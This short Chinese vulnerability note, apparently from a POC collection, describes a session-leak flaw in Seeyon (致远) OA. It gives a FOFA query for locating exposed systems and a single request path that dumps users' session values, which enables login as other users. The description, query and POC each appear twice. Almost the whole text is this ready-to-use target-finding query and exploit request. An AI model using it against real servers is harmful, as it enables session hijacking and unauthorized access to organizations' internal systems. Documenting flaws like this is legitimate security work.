致远OA getSessionList.jsp Session泄漏漏洞
漏洞简介
通过使用存在漏洞的请求时,会回显部分用户的Session值,导致出现任意登录的情况
漏洞复现
fofa语法:app="致远互联-OA"
登录页面如下:
POC:
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
回显session则存在漏洞
通过使用存在漏洞的请求时,会回显部分用户的Session值,导致出现任意登录的情况
fofa语法:app="致远互联-OA"
登录页面如下:
POC:
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
回显session则存在漏洞
